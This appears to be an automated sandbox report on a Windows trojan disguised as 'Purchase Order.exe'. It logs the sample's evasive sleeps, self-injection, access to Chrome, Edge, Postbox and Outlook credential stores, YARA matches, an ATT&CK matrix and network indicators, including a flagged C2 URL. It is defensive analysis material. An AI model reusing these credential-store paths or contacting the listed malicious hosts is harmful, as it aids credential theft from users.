            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: B80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 73E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 6BB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: 4F90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598729Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598293Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597391Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595135Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 8513Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeWindow / User API: threadDelayed 1337Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 180Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 5884Thread sleep count: 8513 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 5884Thread sleep count: 1337 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598729s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598293s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -597063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -596047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595135s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exe TID: 2796Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598729Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598293Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597391Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596719Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595135Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 594469Jump to behavior
            Source: Purchase Order.exe, 00000004.00000002.4419161581.00000000012A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Purchase Order.exeMemory written: C:\Users\user\Desktop\Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            111
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Query Registry
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Security Software Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials1
            System Network Configuration Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing
            DCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Purchase Order.exe21%ReversingLabsWin32.Trojan.Generic
            Purchase Order.exe29%VirustotalBrowse
            Purchase Order.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            reallyfreegeoip.org1%VirustotalBrowse
            scratchdreams.tk6%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            https://scratchdreams.tk100%Avira URL Cloudmalware
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://reallyfreegeoip.org/xml/102.129.152.231$0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/102.129.152.2310%Avira URL Cloudsafe
            https://scratchdreams.tk/_send_.php?TS1%VirustotalBrowse
            http://scratchdreams.tk6%VirustotalBrowse
            https://scratchdreams.tk15%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            us2.smtp.mailhostbox.com
            208.91.198.143
